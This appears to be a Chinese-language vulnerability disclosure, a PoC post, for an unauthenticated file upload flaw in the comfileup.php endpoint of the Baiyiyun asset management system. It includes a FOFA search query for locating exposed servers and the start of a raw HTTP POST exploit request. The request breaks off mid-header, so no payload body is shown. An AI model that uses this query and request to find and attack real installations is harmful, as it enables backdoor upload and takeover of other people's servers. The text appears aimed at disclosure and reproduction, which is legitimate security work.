0x01 產(chǎn)品簡介

百易云資產(chǎn)管理運營系統(tǒng)，是專門針對企業(yè)不動產(chǎn)資產(chǎn)管理和運營需求而設(shè)計的一套綜合解決方案。該系統(tǒng)能夠覆蓋資產(chǎn)的全生命周期管理，包括資產(chǎn)的登記、盤點、評估、處置等多個環(huán)節(jié)，同時提供強大的運營分析功能，幫助企業(yè)優(yōu)化資產(chǎn)配置，提升運營效率。

0x02 漏洞概述

百易云資產(chǎn)管理運營系統(tǒng) comfileup.php 接口存在文件上傳漏洞，未經(jīng)身份驗證的攻擊者通過漏洞上傳惡意后門文件，執(zhí)行任意代碼，從而獲取到服務(wù)器權(quán)限。

0x03 復(fù)現(xiàn)環(huán)境

FOFA：

body="不要著急，點此"

0x04 漏洞復(fù)現(xiàn) 

PoC

POST /comfileup.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; bounda